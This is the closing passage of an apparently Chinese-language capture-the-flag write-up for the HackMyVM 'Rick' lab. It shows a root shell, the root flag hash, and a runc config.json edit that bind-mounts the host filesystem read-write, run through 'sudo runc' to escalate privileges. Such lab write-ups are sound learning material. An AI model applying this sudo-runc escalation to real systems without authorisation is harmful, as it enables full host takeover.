# ls -la\ntotal 32\ndrwx------ 5 root root 4096 Nov 24 2021 .\ndrwxr-xr-x 18 root root 4096 Nov 24 2021 ..\nlrwxrwxrwx 1 root root 9 Nov 24 2021 .bash_history -> \/dev\/null\n-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc\ndrwx------ 3 root root 4096 Nov 24 2021 .gnupg\ndrwxr-xr-x 3 root root 4096 Aug 19 2019 .local\n-rw-r--r-- 1 root root 148 Aug 17 2015 .profile\ndrwx------ 2 root root 4096 Nov 24 2021 .ssh\n-rwx------ 1 root root 36 Nov 24 2021 root.txt\n# cat root.txt\n256fdda9b4e714bf9f38a92750debf70 -\n# pwd\n\/root\n# touch aaa\ntouch: cannot touch 'aaa': Read-only file system<\/code><\/pre>\n\u4fee\u6539\u4e3a\uff1a<\/p>\n
"root": {\n "path": "rootfs",\n "readonly": false # \u9ed8\u8ba4\u4e3a true\n},<\/code><\/pre>\nrick@rick:\/tmp$ vim config.json \nrick@rick:\/tmp$ diff config.json \/home\/rick\/config.json \n55c55\n< "readonly": false\n---\n> "readonly": true\n65,74d64\n< "type": "bind",\n< "source": "\/",\n< "destination": "\/",\n< "options": [\n< "rbind",\n< "rw",\n< "rprivate"\n< ]\n< },\n< {\n188c178\n< }\n---\n> }\n\\ No newline at end of file<\/code><\/pre>\n\u5c1d\u8bd5\u518d\u6b21\u8fdb\u884c\u63d0\u6743\uff0c\u770b\u770b\u80fd\u4e0d\u80fd\u8fdb\u884c\u4fee\u6539\u4e86\uff01<\/p>\n
rick@rick:\/tmp$ sudo \/usr\/sbin\/runc run demo\n# cd ~\n# pwd\n\/root\n# ls -la\ntotal 32\ndrwx------ 5 root root 4096 Nov 24 2021 .\ndrwxr-xr-x 18 root root 4096 Nov 24 2021 ..\nlrwxrwxrwx 1 root root 9 Nov 24 2021 .bash_history -> \/dev\/null\n-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc\ndrwx------ 3 root root 4096 Nov 24 2021 .gnupg\ndrwxr-xr-x 3 root root 4096 Aug 19 2019 .local\n-rw-r--r-- 1 root root 148 Aug 17 2015 .profile\ndrwx------ 2 root root 4096 Nov 24 2021 .ssh\n-rwx------ 1 root root 36 Nov 24 2021 root.txt\n# touch whoami\n# ls -la\ntotal 32\ndrwx------ 5 root root 4096 Jul 16 04:21 .\ndrwxr-xr-x 18 root root 4096 Nov 24 2021 ..\nlrwxrwxrwx 1 root root 9 Nov 24 2021 .bash_history -> \/dev\/null\n-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc\ndrwx------ 3 root root 4096 Nov 24 2021 .gnupg\ndrwxr-xr-x 3 root root 4096 Aug 19 2019 .local\n-rw-r--r-- 1 root root 148 Aug 17 2015 .profile\ndrwx------ 2 root root 4096 Nov 24 2021 .ssh\n-rwx------ 1 root root 36 Nov 24 2021 root.txt\n-rw-r--r-- 1 root root 0 Jul 16 04:21 whoami<\/code><\/pre>\n\u53d1\u73b0\u53ef\u4ee5\u8fdb\u884c\u4fee\u6539\u4e86\uff01\uff01\uff01<\/p>\n
\u53c2\u8003<\/h2>\n
https:\/\/28right.blogspot.com\/2021\/12\/hackmyvm-rick.html<\/a><\/p>\n
![\"image-20240716145813718\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407161722176.png\")
<\/div><\/p>\n![\"image-20240716145913892\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407161722177.png\")
<\/div><\/p>\n![\"image-20240716150219585\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407161722178.png\")
<\/div><\/p>\n![\"image-20240716153154864\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407161722179.png\")
<\/div><\/p>\n![\"image-20240716154603168\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407161722180.png\")
<\/div><\/p>\n![\"image-20240716170114432\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407161722181.png\")
<\/div><\/p>\n